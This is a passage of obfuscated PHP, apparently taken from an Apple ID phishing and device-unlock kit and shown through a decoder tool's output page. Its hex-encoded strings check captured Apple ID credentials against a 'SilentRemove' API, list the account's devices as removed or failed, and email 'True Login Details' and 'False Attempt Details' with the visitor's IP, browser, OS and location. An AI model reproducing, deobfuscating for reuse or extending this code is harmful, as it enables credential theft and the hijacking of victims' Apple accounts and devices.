"\x49\x6e\166\141\x6c\151\144\40\101\160\x70\154\145\x20\x49\104\57\x50\141\x73\163\x77\157\162\x64") == false && stripos($myResult, "\x54\x68\151\x73\40\144\x6f\x6d\x61\151\156\x20\151\x73\x20\156\157\164\x20\x61\165\164\x68\x6f\x72\151\x73\145\x64\40\164\x6f\x20\x75\163\x65\x20\123\x69\x6c\145\x6e\x74\122\145\155\157\166\145\x20\x41\x50\x49") == false && stripos($myResult, "\124\x68\151\163\40\x41\160\x70\154\145\x20\x49\104\x20\151\x73\40\x6c\157\x63\153\x65\x64") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if ($count > 0) { $text = "\360\237\x91\244\x20\116\x61\155\x65\x3a\40{$name}\xa\12\xf0\237\x93\xb1\40\x54\157\x74\141\154\x20\x44\x65\166\x69\143\145\163\x3a\x20{$count}\12\xa"; $devices = $a->devices; foreach ($devices as $device) { $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if ($unlocked) { $unlocked = "\x52\x65\155\157\x76\x65\x64\x20\xf0\237\x91\x8d"; } else { $unlocked = "\x55\156\x6c\x6f\x63\x6b\x20\106\141\151\154\x65\144\x20\xf0\237\x91\216"; } $text .= "\104\x65\166\x69\x63\x65\x20\116\x61\155\x65\72\x20{$aname}\xa\104\145\166\x69\143\x65\40\x4d\157\x64\145\154\72\x20{$model}\xa\104\x65\166\x69\143\145\40\115\157\144\x65\x3a\x20{$mode}\12{$status}\53{$unlocked}\xa\12"; } return $text; } else { return "\x54\150\x69\163\x20\x41\160\160\x6c\x65\40\111\104\40\x6e\x6f\x20\x68\x61\x76\x65\x20\144\x65\166\151\x63\x65\x73\56"; } } else { return "\111\116\x56\x41\114\x49\x44"; } } goto NbHb1; sXhEh: $browser = getBrowser(); goto W3Ytj; rmxDO: $ref = $_POST["\x72\145\x66"]; goto QA04l; n1Sd3: $country = ip_info("\126\151\x73\151\x74\157\162", "\103\x69\x74\x79") . "\40" . ip_info("\126\151\x73\151\x74\x6f\162", "\103\157\x75\x6e\x74\162\171"); goto I38Na; nKv6J: $subjects = "\x46\141\154\163\145\x20\x41\164\x74\x65\155\x70\x74\40\x44\x65\164\141\x69\154\x73"; goto Ai_jp; QA04l: $lang = substr($_SERVER["\x48\x54\x54\x50\x5f\101\x43\103\x45\120\124\137\114\x41\116\x47\x55\101\x47\x45"], 0, 2); goto A920S; nlnfn: $subject = "\124\x72\x75\x65\40\x4c\157\147\x69\x6e\x20\104\x65\x74\141\x69\154\x73"; goto nKv6J; wWgCy: function getOS($user_agent) { $os_platform = "\125\156\x6b\156\x6f\x77\x6e\x20\x4f\123\40\120\154\x61\x74\146\157\162\x6d"; $os_array = array("\57\x77\x69\x6e\x64\157\x77\163\40\x6e\164\40\61\x30\57\151" => "\127\x69\156\x64\157\167\163\40\x31\60", "\57\x77\151\156\x64\157\167\163\x20\156\164\x20\x36\56\x33\57\151" => "\127\151\x6e\144\157\x77\x73\40\70\56\61", "\57\x77\151\156\x64\157\x77\x73\x20\x6e\x74\x20\x36\x2e\x32\57\x69" => "\127\151\x6e\x64\157\167\163\40\x38", "\57\x77\x69\x6e\144\x6f\167\x73\40\x6e\164\40\x36\x2e\61\57\x69" => "\x57\151\156\x64\x6f\x77\x73\40\67", "\x2f\167\x69\156\144\157\x77\x73\40\x6e\164\x20\x36\x2e\x30\57\x69" => "\127\x69\156\144\157\x77\163\x20\126\x69\163\164\141", "\57\167\151\156\x64\157\x77\163\40\156\x74\40\x35\x2e\62\x2f\x69" => "\x57\151\x6e\144\157\167\x73\40\123\x65\x72\x76\145\162\x20\62\60\x30\63\57\x58\x50\x20\170\66\64", "\57\167\x69\156\144\157\x77\x73\x20\x6e\164\x20\x35\x2e\61\x2f\x69" => "\127\151\156\144\x6f\167\x73\x20\130\120", "\57\x77\x69\156\x64\x6f\167\163\40\x78\160\x2f\151" => "\x57\151\156\144\157\x77\163\x20\x58\120", "\57\x77\151\156\x64\x6f\167\163\40\x6e\164\x20\x35\x2e\x30\x2f\x69" => "\x57\x69\x6e\144\x6f\x77\163\40\x32\x30\x30\60", "\57\167\151\156\x64\157\167\163\x20\155\x65\57\x69" => "\x57\x69\x6e\x64\x6f\167\163\x20\x4d\x45", "\x2f\x77\151\x6e\71\x38\57\x69" => "\127\x69\156\x64\x6f\167\x73\40\x39\70", "\57\167\x69\x6e\x39\x35\x2f\151" => "\127\151\156\x64\157\167\163\x20\x39\x35", "\x2f\x77\151\x6e\x31\66\x2f\151" => "\127\x69\156\x64\x6f\x77\x73\40\x33\56\61\61", "\57\x6d\141\143\151\x6e\x74\x6f\x73\x68\x7c\155\141\143\x20\157\x73\x20\170\x2f\x69" => "\x4d\x61\x63\40\117\x53\40\130", "\x2f\155\141\x63\137\x70\x6f\167\x65\162\x70\143\57\x69" => "\115\x61\143\x20\117\123\40\x39", "\x2f\154\151\156\165\170\57\151" => "\x4c\151\156\165\170", "\x2f\x75\142\165\156\164\165\57\151" => "\x55\x62\x75\156\x74\x75", "\x2f\x69\160\x68\x6f\156\x65\x2f\151" => "\x69\120\150\x6f\x6e\x65", "\57\151\160\x6f\x64\x2f\151" => "\x69\120\x6f\144", "\x2f\151\160\141\x64\57\151" => "\151\120\x61\144", "\x2f\141\x6e\x64\x72\157\151\x64\x2f\x69" => "\x41\156\144\x72\157\x69\144", "\x2f\x62\154\x61\143\153\142\x65\162\x72\x79\57\151" => "\x42\154\x61\x63\153\102\145\162\x72\x79", "\57\x77\x65\142\157\163\x2f\x69" => "\x4d\157\142\x69\x6c\x65"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto CfTyT; J9Cb3: function getUserIP() { if (isset($_SERVER["\110\x54\124\120\x5f\x43\x46\x5f\103\x4f\116\116\105\x43\x54\x49\x4e\107\x5f\x49\x50"])) { $_SERVER["\122\105\x4d\x4f\x54\105\137\101\x44\104\122"] = $_SERVER["\110\x54\124\x50\137\x43\x46\x5f\x43\x4f\116\116\x45\103\x54\x49\116\107\x5f\111\120"]; $_SERVER["\x48\124\x54\x50\137\x43\114\111\105\116\124\x5f\x49\120"] = $_SERVER["\110\124\x54\120\x5f\x43\x46\x5f\x43\117\116\116\105\x43\x54\111\116\107\137\111\x50"]; } $client = @$_SERVER["\x48\124\124\120\x5f\x43\x4c\x49\105\116\124\x5f\x49\x50"]; $forward = @$_SERVER["\110\x54\124\120\x5f\130\137\106\x4f\x52\x57\x41\122\104\105\104\137\106\x4f\122"]; $remote = $_SERVER["\122\105\115\117\x54\105\137\101\104\104\122"]; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } return $ip; } goto BVwu3; I38Na: $headers .= "\106\x72\x6f\x6d\72\x20\x69\x53\145\156\144\x65\162\x20\x53\145\x72\x76\145\162" . ''; goto nlnfn; NbHb1: Function Calls
| None |
Stats
| MD5 | d8ed8298cae4beb785184ee529a2ae80 |
| Eval Count | 0 |
| Decode Time | 75 ms |